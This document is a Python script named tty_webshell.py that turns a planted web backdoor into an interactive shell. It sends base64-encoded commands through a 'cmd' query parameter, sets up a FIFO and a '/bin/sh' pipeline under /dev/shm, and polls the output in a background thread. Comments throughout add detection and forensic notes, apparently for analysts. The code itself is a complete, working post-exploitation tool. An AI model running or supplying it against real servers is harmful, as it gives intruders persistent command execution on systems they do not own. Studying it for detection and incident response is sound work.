tty_webshell.py
#!/usr/bin/python3
import requests, time, threading, pdb, signal, sys, re
from base64 import b64encode
from random import randrange
# Exactly one positional argument is required. It is used verbatim as the
# destination of every HTTP request this script sends.
if len(sys.argv) == 2:
    url = sys.argv[1]
else:
    url = ""
    print("\n\n\t[!] Usage: %s {url_with_backdoor}\n\n" % (sys.argv[0]))
    sys.exit(1)
class AllTheReads(object):
    """Background poller that prints what has accumulated in the output file.

    Creating an instance immediately starts a daemon thread running ``run``.
    Each loop iteration issues two ``RunCmd`` calls (one read, one reset of
    the output file) and then sleeps ``interval`` seconds, so the traffic seen
    at the endpoint is a regular, paired request pattern.
    """

    def __init__(self, interval=1):
        """Record the polling interval in seconds and start the reader thread."""
        self.interval = interval
        # Daemon thread: it does not keep the process alive at exit.
        poller = threading.Thread(target=self.run, args=(), daemon=True)
        poller.start()

    def run(self):
        """Loop forever: fetch the output file, strip <pre> tags, print, sleep."""
        fetch_cmd = "/bin/cat %s" % (stdout)
        reset_cmd = "echo '' > %s" % (stdout)
        pre_tags = r'<pre>|</pre>'
        while True:
            raw = RunCmd(fetch_cmd)
            text = re.sub(pre_tags, '', raw)
            # The output file is overwritten after every read, whether or not
            # the read returned anything.
            RunCmd(reset_cmd)
            if text:
                print(text)
            time.sleep(self.interval)
def RunCmd(cmd):
    """Send ``cmd`` to the endpoint at ``url`` and return the stripped body.

    The text is UTF-8 encoded, base64-encoded and wrapped as
    ``echo "<base64>" | base64 -d | sh`` in the ``cmd`` query parameter of a
    GET request with a 5 second timeout.

    Detection note: every request built here carries that fixed wrapper in
    the query string, so the ``base64 -d | sh`` text in a ``cmd`` parameter is
    a stable string to search for wherever request URLs are recorded.
    """
    encoded = b64encode(cmd.encode('utf-8')).decode('utf-8')
    params = {'cmd': 'echo "%s" | base64 -d | sh' % (encoded)}
    response = requests.get(url, params=params, timeout=5)
    return response.text.strip()
def WriteCmd(cmd):
    """Write ``cmd`` into the remote path held in the module-level ``stdin``.

    The text is base64-encoded and sent as
    ``echo "<base64>" | base64 -d > <stdin path>`` in the ``cmd`` query
    parameter of a GET request (5 second timeout). Unlike ``RunCmd``, the
    decoded text is redirected into the file instead of being piped to ``sh``.
    Returns the stripped response body.
    """
    encoded = b64encode(cmd.encode('utf-8')).decode('utf-8')
    params = {'cmd': 'echo "%s" | base64 -d > %s' % (encoded, stdin)}
    response = requests.get(url, params=params, timeout=5)
    return response.text.strip()
def ReadCmd():
    """Return the current contents of the remote output file via ``RunCmd``.

    Nothing in the visible script calls this helper; the polling thread builds
    the same ``/bin/cat`` command itself.
    """
    return RunCmd("/bin/cat %s" % (stdout))
def SetupShell():
    """Ask the endpoint to create the FIFO and start the shell pipeline.

    The command sent is ``mkfifo <stdin>; tail -f <stdin> | /bin/sh 2>&1 > <stdout>``.
    Only the ``stdin`` path is created with ``mkfifo``; the ``stdout`` path is
    the target of a shell redirect.

    Forensic note: on the host this shows up as a ``tail -f`` process piped
    into ``/bin/sh``, both referencing paths under ``/dev/shm``.
    """
    pipeline = "mkfifo %s; tail -f %s | /bin/sh 2>&1 > %s" % (stdin, stdin, stdout)
    try:
        RunCmd(pipeline)
    except:
        # NOTE(review): bare except discards every error from the request,
        # presumably because the 5 second timeout in RunCmd is expected to
        # fire while `tail -f` keeps running - confirm.
        pass
    return None
# Module-level state read by RunCmd/WriteCmd/ReadCmd/SetupShell. The names
# `stdin` and `stdout` are plain path strings here, not file objects.
#
# randrange(1000, 9999) yields a 4-digit suffix (1000..9998), so the remote
# artefacts are always /dev/shm/input.<4 digits> and /dev/shm/output.<4 digits>;
# that naming pattern is what to look for when triaging a host.
session = randrange(1000, 9999)
stdin, stdout = ("/dev/shm/input.%s" % (session), "/dev/shm/output.%s" % (session))
erasestdin, erasestdout = ("/bin/rm %s" % (stdin), "/bin/rm %s" % (stdout))

# Both calls have side effects at import time: one HTTP request to start the
# pipeline, then a background thread that polls the output file.
SetupShell()
ReadingTheThings = AllTheReads()
def sig_handler(sig, frame):
    """SIGINT handler: remove the two /dev/shm paths remotely, then exit 0.

    Forensic note: only the two ``/bin/rm`` commands are sent. Nothing here
    stops the ``tail -f | /bin/sh`` pipeline started by ``SetupShell``, so
    those processes may still be present after the files are gone - confirm
    on the host rather than relying on the file system alone.
    """
    print("\n\n[*] Exiting...\n")
    print("[*] Removing files...\n")
    for removal in (erasestdin, erasestdout):
        RunCmd(removal)
    print("[*] All files have been deleted\n")
    sys.exit(0)
# Ctrl-C is routed to sig_handler, which removes the remote files and exits.
signal.signal(signal.SIGINT, sig_handler)

# Interactive loop: each line typed is written to the remote FIFO with a
# trailing newline. The 1.1 s pause is slightly longer than the poller's
# default 1 s interval.
while True:
    cmd = input("> ")
    WriteCmd("%s\n" % cmd)
    time.sleep(1.1)